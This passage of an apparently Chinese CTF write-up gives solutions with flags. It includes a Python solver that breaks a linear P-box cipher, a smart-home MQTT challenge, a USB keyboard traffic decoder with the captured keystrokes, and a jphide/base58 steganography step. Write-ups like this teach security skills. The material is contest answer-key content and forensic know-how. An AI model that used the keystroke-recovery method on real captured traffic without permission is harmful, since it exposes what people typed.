[0, 3, 5, 8, 9, 17, 21, 22, 24, 25, 26, 27, 30],
[0, 2, 3, 4, 5, 6, 7, 8, 11, 17, 19, 20, 24, 25, 26, 27, 30],
[2, 6, 7, 8, 11, 12, 14, 16, 20, 21, 22, 24, 29, 30, 31],
[0, 2, 5, 6, 7, 8, 9, 10, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 25, 29, 31],
[0, 1, 2, 3, 4, 5, 8, 10, 11, 12, 13, 16, 17, 18, 20, 21, 22, 23, 25, 26, 28, 29, 30],
[3, 5, 6, 8, 10, 13, 14, 17, 19, 20, 21, 22, 24, 26, 27, 29, 30],
[1, 3, 6, 12, 14, 15, 16, 17, 18, 21, 24, 25, 26, 27, 28],
[0, 1, 2, 3, 5, 6, 7, 8, 9, 12, 13, 19, 20, 23, 26, 29, 30],
[3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 20, 21, 22, 25, 26, 27, 28, 29, 30],
[0, 1, 2, 4, 6, 7, 9, 10, 11, 13, 15, 16, 18, 19, 20, 21, 25, 31],
[0, 2, 7, 10, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 25, 29, 31],
[1, 2, 3, 5, 7, 8, 18, 19, 21, 22, 23, 25, 31],
[3, 4, 7, 8, 10, 11, 13, 14, 17, 18, 19, 21, 22, 23, 24, 28, 29],
[0, 2, 6, 7, 8, 10, 11, 12, 13, 16, 18, 19, 21, 23, 31],
[0, 1, 3, 4, 8, 13, 14, 16, 18, 19, 21, 26, 27, 30, 31],
[5, 6, 7, 9, 13, 14, 15, 18, 19, 20, 21, 24, 25, 28],
[1, 3, 4, 5, 6, 7, 11, 14, 16, 17, 19, 20, 21, 22, 23, 25, 30, 31],
[2, 3, 4, 6, 7, 11, 13, 17, 18, 19, 20, 23, 24, 25, 26, 28, 29, 30, 31],
[0, 1, 2, 3, 4, 7, 9, 10, 13, 15, 16, 19, 22, 23, 24, 25, 27],
[0, 1, 3, 4, 12, 16, 18, 19, 26, 30]]

def enc(v, keys):
    t=v
    for i in keys:
       q=[]
       for j in Pbox:
           q.append(sum([t[k] for k in j])%2)
       t=[int(q[j])^int(i[j]) for j in range(32)]
    return t
"""
assert(len(flag)==32)
fb=bin(bytes_to_long(flag))[2:].zfill(32*8)
ciphertext=""
for i in range(0,len(fb),32):
    t=enc([int(j) for j in fb[i:i+32]])
    ciphertext+="".join([str(j) for j in t])
 
print(ciphertext)
"""
def calculate_parameter(a, prm, n):
	for i in range(n):
		p = i
		for j in range(i+1, n):
			if a[j][i] > a[p][i]:
				p = j
		for j in range(n+1):
			tmp = a[i][j]
			a[i][j] = a[p][j]
			a[p][j] = tmp
		for j in range(n):
			if not i == j:
				tt = a[j][i] * pow(a[i][i], prm-2, prm)
				for k in range(i, n+1):
					a[j][k] = (a[j][k] - a[i][k] * tt % prm + prm) % prm
	res = []
	for i in range(n):
		res.append(a[i][n] * pow(a[i][i], prm-2, prm) % prm)
	return res

ciphertext = "0111110000100101000001101011110111101100000010110011101111000101111110111111100100100010001011000101000110110011111101000001001000000101111000001110001111001001100100111000011011101111111101001011100000100100110011111101100111001100111111110001111011101100"

flagcip = ciphertext[:32]
flagplain = b"flag"
fb = bin(bytes_to_long(flagplain))[2:].zfill(32)
x = [int(j) for j in fb]
cip = [int(j) for j in flagcip]
def simu(v):
    t=v
    for i in range(6):
       q=[]
       for j in Pbox:
           q.append(sum([t[k] for k in j])%2)
       t=[int(q[j]) for j in range(32)]
    return t
res = []
for i in range(32):
	s = [0 for j in range(32)]
	s[i] = 1
	res.append(simu(s))
table = []
for i in range(32):
	q = []
	for j in range(32):
		q.append(res[j][i])
	table.append(q)

key = []
for i in range(32):
	key.append((sum([table[i][j]*x[j] for j in range(32)])+cip[i])%2)
print("[+] Key:", key)
realflagbin = ""
for i in range(0, len(ciphertext), 32):
	r = [int(j) for j in ciphertext[i:i+32]]
	#print(r)
	for j in range(32):
		r[j] ^= key[j]
	bb = []
	for j in range(32):
		aa = []
		for what in table[j]:
			aa.append(what)
		aa.append(r[j])
		bb.append(aa)
	solved = calculate_parameter(bb, 2, 32)
	realflagbin += "".join([str(j) for j in solved])

print(long_to_bytes(int(realflagbin, 2)))

Misc

原来你也玩智能家居

在设置里添加mqtt 127.0.0.1:1833 订阅# topic，然后点下显示器开关可以看到flag

1	http://222.187.239.143:10013/config/mqtt?config_entry=ca0e8611ab04cb9be7b1cc53afd56f3c

花花画画画花花

打开osu得到flag

签到题

foremost有个zip

套了很多层，直接把最里面的zip dump出来，最后一层有个伪加密解一下得到一个键盘流量，tshark提取一下从网上扒一个读取的代码就拿到flag了

normalKeys = {
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
    "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
     "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
      "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
       "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
        "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
         "22":"5", "23":"6","24":"7","25":"8","26":"9",
         "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
         "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
         "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
         "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
         "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
         "44":"<F11>","45":"<F12>"}
shiftKeys = {
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
     "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
      "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
       "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
        "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
         "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
          "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
          "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
          "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
          "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
          "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
          "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass

keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass

for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass

print ('output :' + "".join(output))

代码有点问题，shift被跳过了找不到下划线，手动加一下

00:00:11:00:00:00:00:00
['n']
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
00:00:13:00:00:00:00:00
['p']
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
['c']
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
['t']
00:00:00:00:00:00:00:00
00:00:09:00:00:00:00:00
['f']
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:2f:00:00:00:00:00
['{']
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00
['w']
00:00:1a:08:00:00:00:00
['w']
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
['l']
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
['c']
00:00:00:00:00:00:00:00
00:00:12:00:00:00:00:00
['o']
00:00:12:10:00:00:00:00
['o']
00:00:10:00:00:00:00:00
['m']
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:2d:00:00:00:00:00
['_']
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
['t']
00:00:12:00:00:00:00:00
['o']
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:2d:00:00:00:00:00
['_']
00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00
['n']
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
00:00:13:00:00:00:00:00
['p']
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
['c']
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
['t']
00:00:00:00:00:00:00:00
00:00:09:00:00:00:00:00
['f']
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:2d:00:00:00:00:00
['_']
00:00:00:00:00:00:00:00
00:00:1f:00:00:00:00:00
['2']
00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00
['n']
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
['d']
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:30:00:00:00:00:00
['}']
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:28:00:00:00:00:00
['<RET>']
00:00:00:00:00:00:00:00

少见的bbbbase

stegdetect发现是jphide，没有密码

KkYWdvCQcLYewSUUy5TtQc9AMa

根据题目是一个base，都试一遍发现是base58